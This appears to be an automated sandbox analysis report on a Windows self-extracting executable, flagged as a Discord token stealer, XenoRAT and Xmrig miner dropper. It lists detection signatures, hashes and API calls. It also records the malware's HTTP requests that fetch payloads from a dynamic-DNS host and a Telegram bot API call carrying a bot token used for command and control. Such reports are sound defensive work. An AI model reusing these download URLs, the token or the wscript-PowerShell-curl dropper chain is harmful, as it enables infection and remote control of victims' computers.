Windows Analysis Report
SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe

Overview

General Information

Sample name: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe
Analysis ID: 1416947
MD5: 6614077c77a8182f0307a720071f2197
SHA1: 06a06a6d02ad281942ed8b6890f099be54275bb2
SHA256: 2935daeddeb1f505cea4ad368f598ab029942d91d831b71bbe4de5284c7a3132
Tags: exe
Infos:

Detection

Discord Token Stealer, XenoRAT, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
Snort IDS alert for network traffic
Yara detected Discord Token Stealer
Yara detected XenoRAT
Yara detected Xmrig cryptocurrency miner
.NET source code contains potential unpacker
Found strings related to Crypto-Mining
Machine Learning detection for dropped file
Potential malicious VBS script found (suspicious strings)
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Potential Crypto Mining Activity
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses dynamic DNS services
Uses known network protocols on non-standard ports
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
xmrig According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://puredgb.duckdns.org:30000/hyar8z46/discord.exe Avira URL Cloud: Label: malware
Source: http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe Avira URL Cloud: Label: malware
Source: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe Avira URL Cloud: Label: malware
Source: http://puredgb.duckdns.org:30000 Avira URL Cloud: Label: malware
Source: http://puredgb.duckdns.org:30000/g0nv8z1z/creal.exe Avira URL Cloud: Label: malware
Source: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe4 Avira URL Cloud: Label: malware
Source: http://puredgb.duckdns.org:30000/6nif5f8r/address.exe Avira URL Cloud: Label: malware
Source: http://puredgb.duckdns.org Avira URL Cloud: Label: malware
Source: http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\ProgramData\Drivers\xmrig.exe Avira: detection malicious, Label: PUA/GM.Miner.ES
Multi AV Scanner detection for domain / URL
Source: puredgb.duckdns.org Virustotal: Detection: 8% Perma Link
Source: http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe Virustotal: Detection: 7% Perma Link
Source: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe Virustotal: Detection: 7% Perma Link
Source: http://puredgb.duckdns.org:30000/hyar8z46/discord.exe Virustotal: Detection: 7% Perma Link
Source: http://puredgb.duckdns.org:30000 Virustotal: Detection: 7% Perma Link
Source: http://puredgb.duckdns.org:30000/6nif5f8r/address.exe Virustotal: Detection: 7% Perma Link
Source: http://puredgb.duckdns.org Virustotal: Detection: 8% Perma Link
Source: http://puredgb.duckdns.org:30000/g0nv8z1z/creal.exe Virustotal: Detection: 7% Perma Link
Source: http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe Virustotal: Detection: 7% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\Drivers\xmrig.exe ReversingLabs: Detection: 60%
Source: C:\ProgramData\Drivers\xmrig.exe Virustotal: Detection: 72% Perma Link
Source: C:\Users\user\AppData\Roaming\1.exe ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Roaming\1.exe Virustotal: Detection: 27% Perma Link
Source: C:\Users\user\AppData\Roaming\2.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Roaming\2.exe Virustotal: Detection: 66% Perma Link
Source: C:\Users\user\AppData\Roaming\6.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\6.exe Virustotal: Detection: 57% Perma Link
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Virustotal: Detection: 13% Perma Link
Machine Learning detection for dropped file
Source: C:\ProgramData\Drivers\xmrig.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033F4244 CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,wcslen, 27_2_00007FF7033F4244
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033DE6A4 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 27_2_00007FF7033DE6A4
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033DF970 memset,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 27_2_00007FF7033DF970
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033DF0EC memset,_strdup,fopen,free,fseek,ftell,fread,fclose,free,fseek,malloc,strlen,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free, 27_2_00007FF7033DF0EC
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033F9E60 CryptHashData, 27_2_00007FF7033F9E60
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033F9E70 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 27_2_00007FF7033F9E70
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033F3D58 strlen,strlen,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, 27_2_00007FF7033F3D58
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033F9E14 CryptAcquireContextA,CryptCreateHash, 27_2_00007FF7033F9E14
Source: C:\Users\user\AppData\Roaming\1.exe Code function: -----BEGIN PUBLIC KEY----- 27_2_00007FF7033CCD8C
Source: 1.exe Binary or memory string: -----BEGIN PUBLIC KEY-----

Bitcoin Miner
barindex
Yara detected Xmrig cryptocurrency miner
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 21.0.xmrig.exe.7ff750e90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.6.exe.1b665fa72bc.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000002.3899504709.000001CD41524000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3899711006.000001CD42E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3899711006.000001CD42E52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3899633075.000001CD415A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3899504709.000001CD41520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.1543780130.00007FF751980000.00000008.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3899711006.000001CD42E7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.1543578231.00007FF75148F000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3899711006.000001CD42EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3899633075.000001CD415A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1507397894.000001B666732000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1507397894.000001B6665A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1507397894.000001B665FA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6.exe PID: 4272, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: conhost.exe PID: 3436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xmrig.exe PID: 1308, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\Drivers\process.bat, type: DROPPED
Source: Yara match File source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED
Found strings related to Crypto-Mining
Source: 6.exe, 00000006.00000003.1507397894.000001B6665A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: stratum+ssl://randomx.xmrig.com:443
Source: 6.exe, 00000006.00000003.1507397894.000001B6665A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: cryptonight/0
Source: 6.exe, 00000006.00000003.1507397894.000001B6665A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: -o, --url=URL URL of mining server
Source: 6.exe, 00000006.00000003.1507397894.000001B6665A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: stratum+tcp://
Source: 6.exe, 00000006.00000003.1507397894.000001B6665A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: xmrig [OPTIONS]
Source: 6.exe, 00000006.00000003.1507397894.000001B666732000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: FileDescriptionXMRig miner.
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49713 version: TLS 1.2
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: 6.exe, 00000006.00000003.1507397894.000001B666732000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.6.dr
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe, tmp.vbs.27.dr, 6.exe.5.dr
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332A40CC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF7332A40CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332BADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF7332BADF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332CF900 FindFirstFileExA, 0_2_00007FF7332CF900
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C572ADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 6_2_00007FF6C572ADF0
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57140CC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 6_2_00007FF6C57140CC
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C573F900 FindFirstFileExA, 6_2_00007FF6C573F900
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033FA438 FindClose,abort,FindFirstFileExW,GetLastError, 27_2_00007FF7033FA438
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033FA4AC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort, 27_2_00007FF7033FA4AC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2CADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 31_2_00007FF75C2CADF0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2B40CC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 31_2_00007FF75C2B40CC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2DF900 FindFirstFileExA, 31_2_00007FF75C2DF900
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\System32\curl.exe

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2047928 ET TROJAN CoinMiner Domain in DNS Lookup (pool .supportxmr .com) 192.168.2.11:63049 -> 1.1.1.1:53
Uses dynamic DNS services
Source: unknown DNS query: name: puredgb.duckdns.org
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49725
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.11:49704 -> 200.165.100.3:30000
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TelemarNorteLesteSABR TelemarNorteLesteSABR
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /ejr9e45s/xmr.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: puredgb.duckdns.org:30000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /hyar8z46/discord.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: puredgb.duckdns.org:30000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /gn1jv6sz/xeno.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: puredgb.duckdns.org:30000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /6nif5f8r/address.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: puredgb.duckdns.org:30000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /g0nv8z1z/creal.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: puredgb.duckdns.org:30000Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033DA5D8 recv,WSAGetLastError, 27_2_00007FF7033DA5D8
Source: global traffic HTTP traffic detected: GET /bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success HTTP/1.1Host: api.telegram.orgUser-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /ejr9e45s/xmr.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: puredgb.duckdns.org:30000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /hyar8z46/discord.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: puredgb.duckdns.org:30000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xmg8oxqt/ping.exe HTTP/1.1Host: puredgb.duckdns.org:30000User-Agent: curl/7.79.1Accept: */*
Source: global traffic HTTP traffic detected: GET /gn1jv6sz/xeno.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: puredgb.duckdns.org:30000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /6nif5f8r/address.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: puredgb.duckdns.org:30000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /g0nv8z1z/creal.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: puredgb.duckdns.org:30000Connection: Keep-Alive
Source: unknown DNS traffic detected: queries for: puredgb.duckdns.org
Source: 6.exe, 00000006.00000003.1507397894.000001B666732000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.6.dr String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: 6.exe, 00000006.00000003.1507397894.000001B666732000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.6.dr String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: 6.exe, 00000006.00000003.1507397894.000001B666732000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.6.dr String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: 6.exe, 00000006.00000003.1507397894.000001B666732000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.6.dr String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: powershell.exe, 00000005.00000002.1528272772.00000237EBE30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m
Source: powershell.exe, 0000000F.00000002.1568050598.000001A3C9734000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoftH
Source: 1.exe.15.dr String found in binary or memory: http://decimate.online
Source: 1.exe, 0000001B.00000000.1562896963.00007FF7033FE000.00000002.00000001.01000000.0000000E.sdmp, 1.exe, 0000001B.00000002.1640875740.00007FF7033FE000.00000002.00000001.01000000.0000000E.sdmp, 1.exe.15.dr String found in binary or memory: http://decimate.onlinehey
Source: powershell.exe, 00000005.00000002.1502923504.00000237D54CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1523797600.00000237E3B4B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1523797600.00000237E3C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1863548898.000001A3DB3AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1569608171.000001A3CCC1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1863548898.000001A3DB4E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2098753639.000001DDB9330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2098753639.000001DDB91FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1958573252.000001DDAAA70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000034.00000002.1958573252.000001DDA93B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1502923504.00000237D50C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1569608171.000001A3CC918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1958573252.000001DDAA771000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://puredgb.duckdns.org
Source: powershell.exe, 00000005.00000002.1502923504.00000237D4702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1569608171.000001A3CBF62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1958573252.000001DDAA4DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://puredgb.duckdns.org:30000
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe, 00000000.00000003.1435018576.000001A2A1CFE000.00000004.00000020.00020000.00000000.sdmp, down.bat.0.dr String found in binary or memory: http://puredgb.duckdns.org:30000/6nif5f8r/address.exe
Source: powershell.exe, 00000005.00000002.1502323820.00000237D1CED000.00000004.00000020.00020000.00000000.sdmp, down.bat.0.dr String found in binary or memory: http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe, 00000000.00000003.1435018576.000001A2A1CFE000.00000004.00000020.00020000.00000000.sdmp, down.bat.0.dr String found in binary or memory: http://puredgb.duckdns.org:30000/g0nv8z1z/creal.exe
